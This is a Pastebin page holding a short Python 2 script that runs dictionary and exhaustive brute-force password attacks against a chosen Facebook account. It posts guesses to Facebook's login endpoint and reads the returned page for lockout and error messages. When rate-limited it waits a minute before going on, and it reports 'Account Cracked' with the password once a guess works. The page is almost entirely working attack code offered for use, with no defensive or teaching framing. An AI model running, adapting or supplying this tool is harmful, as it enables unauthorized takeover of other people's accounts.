Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib
- import urllib2
- import cookielib
- import time
- import argparse
- from itertools import product
- parser = argparse.ArgumentParser(description='inputs') #creates ArgumentParser object, will parse cli into python data types
- parser.add_argument("-t", "--target", help="Target") #tells how to take strings on CLI and turn into objects
- parser.add_argument("-d", "--dictionary", help="Dictionary") #
- parser.add_argument("-b", "--brute", help="Brute Force")
- args = parser.parse_args()
- stop = False
- print args.target
- print __name__
- if args.target:
- def login(tgt, passw):
- error = False
- cj = cookielib.CookieJar()
- opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
- login_data = urllib.urlencode({"email" : tgt, "pass" : passw})
- resp = opener.open("https://login.facebook.com/login.php", login_data)
- contents = resp.read()
- if '<div class="fsl fwb fcb">Cookies Required</div>' in contents:
- print '[*] Setting Cookies'
- print '[*] Attempting Password: ' + passw
- resp = opener.open("https://login.facebook.com/login.php", login_data)
- contents = resp.read()
- if "<p>The phone number you entered does not belong to any account.</p>" in contents or "<p>The email address you entered does not belong to any account.</p>" in contents:
- print "[!] Account does not exist"
- exit()
- if '<div class="fls fwb fcb">Please re-enter your password</div>' in contents:
- print "[-] Access Denied"
- error = True
- if '<div class="fsl fwb fcb">Cookies Required</div>' in contents:
- print "[!] Cookie Error"
- exit()
- if '<div class="fsl fwb fcb">Please try again later</div>' in contents:
- print "[-] Ammount of attempts exhaust - Reattempting in 1 minute"
- time.sleep(60)
- error = True
- elif error == True:
- pass
- else:
- print "[+] Account Cracked - Password: "+ passw
- exit()
- if args.dictionary and args.brute:
- print "The correct syntax is: python script.py -t <target> -d <dictionary attack/file> / -b <max> <brute force>"
- if args.dictionary:
- passwordfile = open(args.dictionary, "r")
- for line in passwordfile:
- login(args.target, line.strip())
- if args.brute:
- characters = "`1234567890-=qwertyuiop[]asdfghhjkl;'zxcvbnm,./\~!@#$%^&*()_+QWERTYUIOP{}ASDFGHJKL:" + '"' + "ZXCVBNM<>?|"
- for length in range(1,int(args.brute)):
- to_attempt = product(characters, repeat = length)
- for attempt in to_attempt:
- password = ("".join(attempt))
- login(args.target, password)
- if "__main__" == __name__:
- if stop == False:
- print __name__
- print "The correct syntax is: python script.py -t <target> -d <dictionary attack/file> / -b <max> <brute force>"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement